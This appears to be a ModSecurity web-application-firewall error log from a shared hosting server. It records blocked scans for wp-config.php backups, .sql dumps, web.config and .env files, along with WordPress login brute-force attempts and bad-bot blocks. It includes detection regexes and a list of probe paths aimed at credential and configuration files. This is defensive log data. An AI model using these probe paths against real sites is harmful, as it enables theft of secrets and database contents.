[Tue May 26 14:30:34.020112 2026] [security2:error] [pid 610693:tid 610752] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php"] [unique_id "ahVhMjvNO3hpmlY6M8RxhAAAZTo"]
[Tue May 26 14:30:34.355831 2026] [security2:error] [pid 610693:tid 610766] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/config.php.bak"] [unique_id "ahVhMjvNO3hpmlY6M8RxhgAANEg"]
[Tue May 26 14:30:34.721206 2026] [security2:error] [pid 606909:tid 607134] [client 154.161.32.97:46540] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhMl0yRtX9qA7aVUV2rAAAAOQ"]
[Tue May 26 14:30:34.743781 2026] [security2:error] [pid 610693:tid 610751] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.backup"] [unique_id "ahVhMjvNO3hpmlY6M8RxjgAAdDk"]
[Tue May 26 14:30:35.030430 2026] [security2:error] [pid 610693:tid 610899] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhMjvNO3hpmlY6M8RxiwAAAEw"]
[Tue May 26 14:30:35.528607 2026] [security2:error] [pid 610693:tid 610881] [client 34.74.242.206:1544] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVhMzvNO3hpmlY6M8RxkQAAADo"]
[Tue May 26 14:30:35.528732 2026] [security2:error] [pid 610693:tid 610881] [client 34.74.242.206:1544] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "businessclubinternational.net"] [uri "/robots.txt"] [unique_id "ahVhMzvNO3hpmlY6M8RxkQAAADo"]
[Tue May 26 14:30:35.528830 2026] [security2:error] [pid 610693:tid 610764] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.bak"] [unique_id "ahVhMzvNO3hpmlY6M8RxkgAAbkY"]
[Tue May 26 14:30:35.668969 2026] [security2:error] [pid 610693:tid 610832] [client 34.74.242.206:1564] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "businessclubinternational.net"] [uri "/"] [unique_id "ahVhMzvNO3hpmlY6M8RxkwAAAAk"]
[Tue May 26 14:30:35.669121 2026] [security2:error] [pid 610693:tid 610832] [client 34.74.242.206:1564] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "businessclubinternational.net"] [uri "/"] [unique_id "ahVhMzvNO3hpmlY6M8RxkwAAAAk"]
[Tue May 26 14:30:36.828758 2026] [security2:error] [pid 610693:tid 610767] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.old"] [unique_id "ahVhNDvNO3hpmlY6M8RxogAAKkk"]
[Tue May 26 14:30:36.892915 2026] [security2:error] [pid 610693:tid 610857] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhNDvNO3hpmlY6M8RxnAAAACI"]
[Tue May 26 14:30:37.270887 2026] [security2:error] [pid 610693:tid 610773] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.save"] [unique_id "ahVhNTvNO3hpmlY6M8RxqwAAbU8"]
[Tue May 26 14:30:37.477599 2026] [security2:error] [pid 610693:tid 610770] [remote 37.187.156.42:55058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVhNTvNO3hpmlY6M8RxrAAAPUw"]
[Tue May 26 14:30:37.632067 2026] [security2:error] [pid 610693:tid 610775] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.swp"] [unique_id "ahVhNTvNO3hpmlY6M8RxsgAADlE"]
[Tue May 26 14:30:38.784055 2026] [security2:error] [pid 610693:tid 610780] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/wp-config.php.txt"] [unique_id "ahVhNjvNO3hpmlY6M8RxxgAASlY"]
[Tue May 26 14:30:39.117154 2026] [security2:error] [pid 610693:tid 610887] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhNjvNO3hpmlY6M8RxxQAAAEA"]
[Tue May 26 14:30:40.087572 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:53841] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhNzvNO3hpmlY6M8Rx3AAAAHI"]
[Tue May 26 14:30:40.087712 2026] [security2:error] [pid 610693:tid 610937] [client 202.141.83.254:53841] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhNzvNO3hpmlY6M8Rx3AAAAHI"]
[Tue May 26 14:30:40.957437 2026] [security2:error] [pid 606909:tid 607135] [client 193.37.33.150:39735] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVhN10yRtX9qA7aVUV3BQAAAOU"]
[Tue May 26 14:30:40.967380 2026] [security2:error] [pid 610693:tid 610898] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhODvNO3hpmlY6M8Rx7QAAAEs"]
[Tue May 26 14:30:43.252509 2026] [security2:error] [pid 610693:tid 610915] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhOjvNO3hpmlY6M8RyHQAAAFw"]
[Tue May 26 14:30:44.198487 2026] [security2:error] [pid 610693:tid 610793] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/web.config"] [unique_id "ahVhPDvNO3hpmlY6M8RyKgAAJGM"]
[Tue May 26 14:30:45.243554 2026] [security2:error] [pid 610693:tid 610932] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhPDvNO3hpmlY6M8RyMwAAAG0"]
[Tue May 26 14:30:45.328616 2026] [security2:error] [pid 606909:tid 607008] [remote 20.153.140.50:51044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 50.140.153.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVhPV0yRtX9qA7aVUV3MAAA3mI"]
[Tue May 26 14:30:47.290549 2026] [security2:error] [pid 606909:tid 607166] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhPl0yRtX9qA7aVUV3UQAAAQQ"]
[Tue May 26 14:30:47.600884 2026] [security2:error] [pid 610693:tid 610915] [client 69.165.72.57:61357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 57.72.165.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahVhPzvNO3hpmlY6M8RyZAAAAFw"], referer: https://obinnawrites.com.thedebateafrica.org
[Tue May 26 14:30:48.749585 2026] [security2:error] [pid 610693:tid 610694] [remote 82.196.25.136:52402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.25.196.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVhQDvNO3hpmlY6M8RycgAAHwA"]
[Tue May 26 14:30:49.247680 2026] [security2:error] [pid 610693:tid 610943] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhQDvNO3hpmlY6M8RyeAAAAHg"]
[Tue May 26 14:30:50.321679 2026] [security2:error] [pid 610693:tid 610900] [client 202.141.83.254:5651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhQjvNO3hpmlY6M8RyiwAAAE0"]
[Tue May 26 14:30:50.321815 2026] [security2:error] [pid 610693:tid 610900] [client 202.141.83.254:5651] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhQjvNO3hpmlY6M8RyiwAAAE0"]
[Tue May 26 14:30:51.452499 2026] [security2:error] [pid 606909:tid 607039] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhQl0yRtX9qA7aVUV3fAAAAIU"]
[Tue May 26 14:30:51.851768 2026] [security2:error] [pid 610693:tid 610832] [client 104.28.122.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVhQzvNO3hpmlY6M8RyowAAAAk"]
[Tue May 26 14:30:53.530944 2026] [security2:error] [pid 610693:tid 610897] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhRTvNO3hpmlY6M8RytgAAAEo"]
[Tue May 26 14:30:54.506189 2026] [security2:error] [pid 610693:tid 610799] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/database.sql"] [unique_id "ahVhRjvNO3hpmlY6M8RyyQAAaGk"]
[Tue May 26 14:30:54.526388 2026] [security2:error] [pid 606909:tid 606967] [remote 74.7.241.58:37496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVhRl0yRtX9qA7aVUV3nwAA3Dk"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/fl
[Tue May 26 14:30:54.832774 2026] [security2:error] [pid 610693:tid 610812] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/dump.sql"] [unique_id "ahVhRjvNO3hpmlY6M8Ry1QAAd3Y"]
[Tue May 26 14:30:55.214592 2026] [security2:error] [pid 610693:tid 610820] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/backup.sql"] [unique_id "ahVhRzvNO3hpmlY6M8Ry2AAAW34"]
[Tue May 26 14:30:55.463651 2026] [security2:error] [pid 610693:tid 610699] [remote 45.148.10.5:54922] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "goadityaholidays.com.whitesun.in"] [uri "/db.sql"] [unique_id "ahVhRzvNO3hpmlY6M8Ry3AAAOgU"]
[Tue May 26 14:30:55.566438 2026] [security2:error] [pid 610693:tid 610826] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhRzvNO3hpmlY6M8Ry1wAAAAM"]
[Tue May 26 14:30:57.159445 2026] [security2:error] [pid 610693:tid 610904] [client 2.57.122.173:43156] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.grcorp.moes-art.com"] [uri "/secrets/.env"] [unique_id "ahVhSTvNO3hpmlY6M8Ry-wAAAFE"]
[Tue May 26 14:30:57.708798 2026] [security2:error] [pid 610693:tid 610856] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhSTvNO3hpmlY6M8Ry_wAAACE"]
[Tue May 26 14:31:00.030375 2026] [security2:error] [pid 610693:tid 610711] [remote 103.91.67.202:59440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVhSzvNO3hpmlY6M8RzNQAAHxE"]
[Tue May 26 14:31:00.049150 2026] [security2:error] [pid 606909:tid 607103] [client 157.48.135.118:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhS10yRtX9qA7aVUV3ywAAAMU"]
[Tue May 26 14:31:00.666139 2026] [security2:error] [pid 610693:tid 610833] [client 202.141.83.254:5730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhTDvNO3hpmlY6M8RzQwAAAAo"]
[Tue May 26 14:31:00.666312 2026] [security2:error] [pid 610693:tid 610833] [client 202.141.83.254:5730] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhTDvNO3hpmlY6M8RzQwAAAAo"]
[Tue May 26 14:31:00.775742 2026] [security2:error] [pid 606909:tid 607107] [client 114.119.128.127:47275] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVhTF0yRtX9qA7aVUV31AAAAMk"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&product_id=94&page=8
[Tue May 26 14:31:01.147000 2026] [security2:error] [pid 610693:tid 610923] [client 216.244.66.241:51830] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTTvNO3hpmlY6M8RzSAAAAGQ"]
[Tue May 26 14:31:01.147145 2026] [security2:error] [pid 610693:tid 610923] [client 216.244.66.241:51830] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTTvNO3hpmlY6M8RzSAAAAGQ"]
[Tue May 26 14:31:01.147284 2026] [security2:error] [pid 606909:tid 607092] [client 216.244.66.241:51828] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTV0yRtX9qA7aVUV32AAAALo"]
[Tue May 26 14:31:01.147477 2026] [security2:error] [pid 606909:tid 607092] [client 216.244.66.241:51828] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahVhTV0yRtX9qA7aVUV32AAAALo"]
[Tue May 26 14:31:01.363825 2026] [security2:error] [pid 606909:tid 607064] [client 2.57.122.173:25688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.grcorp.moes-art.com"] [uri "/.env"] [unique_id "ahVhTV0yRtX9qA7aVUV33AAAAJ4"]
[Tue May 26 14:31:02.503441 2026] [security2:error] [pid 606909:tid 607153] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhTl0yRtX9qA7aVUV36gAAAPc"]
[Tue May 26 14:31:02.997837 2026] [security2:error] [pid 610693:tid 610860] [client 154.161.32.97:46541] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhTjvNO3hpmlY6M8RzWQAAACU"]
[Tue May 26 14:31:03.708212 2026] [security2:error] [pid 610693:tid 610936] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhTzvNO3hpmlY6M8RzYwAAAHE"]
[Tue May 26 14:31:05.883123 2026] [security2:error] [pid 610693:tid 610840] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhUTvNO3hpmlY6M8RzgQAAABE"]
[Tue May 26 14:31:05.945802 2026] [security2:error] [pid 610693:tid 610927] [client 85.208.96.209:54774] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/flipping-fridays/list/"] [unique_id "ahVhUTvNO3hpmlY6M8RzigAAAGg"]
